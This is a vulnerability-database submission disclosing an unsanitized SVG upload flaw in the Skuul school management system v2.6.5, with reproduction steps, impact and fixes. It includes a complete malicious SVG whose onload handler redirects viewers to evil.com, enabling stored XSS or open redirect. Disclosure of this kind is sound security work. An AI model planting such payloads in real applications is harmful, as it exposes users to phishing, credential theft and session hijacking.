Submit #689012: yungifez Skuul v2.6.5 Open Redirectinfo

Title	yungifez Skuul v2.6.5 Open Redirect
Description	Skuul version 2.6.5 allows the upload of unsanitized SVG files in the Edit School section. Since the application serves uploaded SVGs directly without sanitization or content-type enforcement, attackers can embed JavaScript or redirection payloads inside SVGs. When a user or administrator opens the uploaded image in a new tab, the browser executes the embedded script, resulting in a stored cross-site scripting (XSS) or open redirect attack. Steps to Reproduce: 1. Log in to the Skuul http://127.0.0.1:8000/login as Admin 2. Navigate to: http://sk.htb:8000/dashboard/schools/1/edit 3. Upload the SVG file with following content: <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="window.location='https://evil.com/'"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> </svg> 4. If any user such as (Super Admin, Student, Teacher or Parent) Open Image in New Tab. 5. The browser will automatically redirect to https://evil.com/. Impact: -) Automatic redirection to attacker-controlled websites (phishing/malware risk). -) Stored XSS possibility through malicious SVG payloads. -) User credential theft or session hijacking if same-origin. -) High impact if admin account is compromised, affecting all users. -) Loss of user trust and potential reputational damage to the platform. Recommendation: -) Disallow SVG uploads entirely, or -) Sanitize SVGs using libraries like DOMPurify, sanitize-svg, or similar before storage. -) Serve SVGs with the Content-Type: image/svg+xml header and force download where possible. -) Store and serve only rasterized versions (e.g., PNG/JPEG). Affected Version: Skuul v2.6.5 Product Source: -) Website: https://yungifez.github.io/skuul.org/ -) GitHub Repository: https://github.com/yungifez/skuul Credits Zeeshan Khan https://www.thezeeshankhan.site/
Source	⚠️ https://gist.github.com/thezeekhan/7fc54fd44bc5f318be0350b367b2d8ff
User	Zeeshan Khan (UID 91384)
Submission	11/04/2025 17:57 (8 months ago)
Moderation	11/29/2025 13:59 (25 days later)
Status	Accepted
VulDB entry	333788 [yungifez Skuul School Management System up to 2.6.5 SVG File edit cross site scripting]
Points	20

◂ Previous Overview Next ▸

Interested in the pricing of exploits?

See the underground prices here!